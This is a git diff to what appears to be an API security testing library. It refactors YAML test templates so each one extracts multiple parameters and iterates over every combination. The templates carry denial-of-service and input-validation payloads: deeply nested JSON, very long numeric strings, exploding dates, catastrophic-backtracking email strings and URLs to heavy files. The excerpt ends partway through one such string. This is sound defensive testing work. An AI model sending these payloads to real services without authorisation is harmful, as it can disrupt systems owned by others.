modify_body_param: - userKey2: "1*${attemptValues4}" + ${userKey2}: "1*${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues4}" + ${userKey3}: "${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues3} + ${userKey1}: ${attemptValues3} + for_each_combination: true - validate: response_code: gte: 200 @@ -203,11 +206,14 @@ execute: - failure: exit - req: - modify_body_param: - userKey2: "1*${attemptValues2}" + ${userKey2}: "1*${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues2}" + ${userKey3}: "${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues1} + ${userKey1}: ${attemptValues1} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulatingTimeFrequency.yml b/Input-Validation/ManipulatingTimeFrequency.yml index d335a081a..c8583ca44 100644 --- a/Input-Validation/ManipulatingTimeFrequency.yml +++ b/Input-Validation/ManipulatingTimeFrequency.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey wordLists: probableInputParameters: @@ -152,7 +152,8 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: ${sampleValues} + ${userKey}: ${sampleValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/NumberValidation.yml b/Input-Validation/NumberValidation.yml index 396f29d47..baa9ff93f 100644 --- a/Input-Validation/NumberValidation.yml +++ b/Input-Validation/NumberValidation.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -122,7 +122,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/PayloadKeysInvalidValues.yml b/Input-Validation/PayloadKeysInvalidValues.yml index a3d177706..918ec3bb8 100644 --- a/Input-Validation/PayloadKeysInvalidValues.yml +++ b/Input-Validation/PayloadKeysInvalidValues.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -90,7 +90,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${userVal}${attemptValues}" + ${userKey}: "${userVal}${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -105,7 +106,8 @@ execute: - failure: x3 - req: - modify_body_param: - userKey: "${attemptValues}" + ${userKey}: "${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -120,7 +122,8 @@ execute: - failure: x4 - req: - modify_body_param: - userKey: "${attemptValues}${userVal}" + ${userKey}: "${attemptValues}${userVal}" + for_each_combination: true - validate: response_code: gte: 200 @@ -135,7 +138,8 @@ execute: - failure: x5 - req: - modify_body_param: - userKey: "${attemptValues2}" + ${userKey}: "${attemptValues2}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml b/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml index a74a54155..524edfc32 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DateFieldInputDoS.yml @@ -101,7 +101,7 @@ api_selection_filters: - report_start - report_end - date - extract: userKey + extractMultiple: userKey - query_param: for_one: key: @@ -139,7 +139,7 @@ api_selection_filters: - reportEnd - report_start - report_end - extract: userKey + extractMultiple: userKey wordLists: explodingDates: - "0000-01-01" @@ -181,9 +181,11 @@ execute: - failure: exit - req: - modify_query_param: - userKey: "${explodingDates}" + ${userKey}: "${explodingDates}" + for_each_combination: true - modify_body_param: - userKey: "${explodingDates}" + ${userKey}: "${explodingDates}" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml b/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml index 0e870a65e..a8cc54c3c 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSDeeplyNestedJSONBody.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal execute: @@ -113,7 +113,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":\"${userVal}\"}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}" + ${userKey}: "{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":{\"${userKey}\":\"${userVal}\"}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml index bce16626c..eeb9247c4 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestCSVFileURL.yml @@ -71,14 +71,14 @@ api_selection_filters: contains_either: - .csv key: - extract: csv_key + extractMultiple: csv_key - query_param: for_one: value: contains_either: - .csv key: - extract: csv_key + extractMultiple: csv_key execute: type: multiple requests: @@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - csv_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + ${csv_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + for_each_combination: true - modify_body_param: - csv_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + ${csv_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/file.csv + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml index 406a21c7d..b592afecb 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderKey.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: headerKey + extractMultiple: headerKey value: extract: headerValue wordLists: @@ -121,9 +121,10 @@ execute: - success: x2 - failure: exit - req: - - delete_header: headerKey + - delete_header: ${headerKey} - add_header: ${headerParamKeys}: headerValue + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml index 583c4ecd2..6ece35843 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestHeaderValue.yml @@ -67,7 +67,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: headerKey + extractMultiple: headerKey wordLists: headerParamValues: - "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" @@ -119,7 +119,8 @@ execute: - failure: exit - req: - modify_header: - headerKey: ${headerParamValues} + ${headerKey}: ${headerParamValues} + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml index f83cfaa97..f2313d0b2 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestJPGFileURL.yml @@ -69,14 +69,14 @@ api_selection_filters: contains_either: - .jpg key: - extract: jpg_key + extractMultiple: jpg_key - query_param: for_one: value: contains_either: - .jpg key: - extract: jpg_key + extractMultiple: jpg_key execute: type: multiple requests: @@ -119,9 +119,11 @@ execute: - failure: exit - req: - modify_query_param: - jpg_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + ${jpg_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + for_each_combination: true - modify_body_param: - jpg_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + ${jpg_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/photo.jpeg + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml index 8e2ad3bd3..162dbc553 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestJSONBodyKey.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userValue wordLists: diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml index 1972dc0f2..e69124d6a 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestLongStringQueryParamJSONBodyValues.yml @@ -68,12 +68,12 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey - query_param: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey wordLists: queryParamValues: - "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" @@ -125,9 +125,11 @@ execute: - failure: exit - req: - modify_query_param: - userKey: "${queryParamValues}" + ${userKey}: "${queryParamValues}" + for_each_combination: true - modify_body_param: - userKey: "${queryParamValues}" + ${userKey}: "${queryParamValues}" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml index 07484f193..38e572fcc 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestMP4FileURL.yml @@ -70,14 +70,14 @@ api_selection_filters: contains_either: - .mp4 key: - extract: mp4_key + extractMultiple: mp4_key - query_param: for_one: value: contains_either: - .mp4 key: - extract: mp4_key + extractMultiple: mp4_key execute: type: multiple requests: @@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - mp4_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + ${mp4_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + for_each_combination: true - modify_body_param: - mp4_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + ${mp4_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/video.mp4 + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml index 2d648be81..a77417159 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestPDFFileURL.yml @@ -70,14 +70,14 @@ api_selection_filters: contains_either: - .pdf key: - extract: pdf_key + extractMultiple: pdf_key - query_param: for_one: value: contains_either: - .pdf key: - extract: pdf_key + extractMultiple: pdf_key execute: type: multiple requests: @@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - pdf_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + ${pdf_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + for_each_combination: true - modify_body_param: - pdf_key: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + ${pdf_key}: https://github.com/akto-api-security/tests-library/raw/akto_resources/resources/heavy%20files/heavy-pdf.pdf + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml index 0ad36d93d..2f77c7f74 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestPNGFileURL.yml @@ -70,14 +70,14 @@ api_selection_filters: contains_either: - .png key: - extract: png_key + extractMultiple: png_key - query_param: for_one: value: contains_either: - .png key: - extract: png_key + extractMultiple: png_key execute: type: multiple requests: @@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - png_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + ${png_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + for_each_combination: true - modify_body_param: - png_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + ${png_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml index 7fce589e4..336db530e 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml @@ -69,14 +69,14 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userValue - query_param: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userValue wordLists: @@ -133,6 +133,7 @@ execute: - delete_query_param: ${userKey} - add_query_param: ${queryParamValues}: userValue + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml b/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml index b24830bbc..0239c26a8 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -102,7 +102,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml b/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml index d49c66858..eefc15c89 100644 --- a/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml +++ b/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml @@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey execute: type: multiple @@ -114,7 +114,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + ${userKey}: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml b/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml index 762a52050..9f8895db8 100644 --- a/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml @@ -76,7 +76,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey - request_payload: for_one: key: @@ -125,7 +125,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a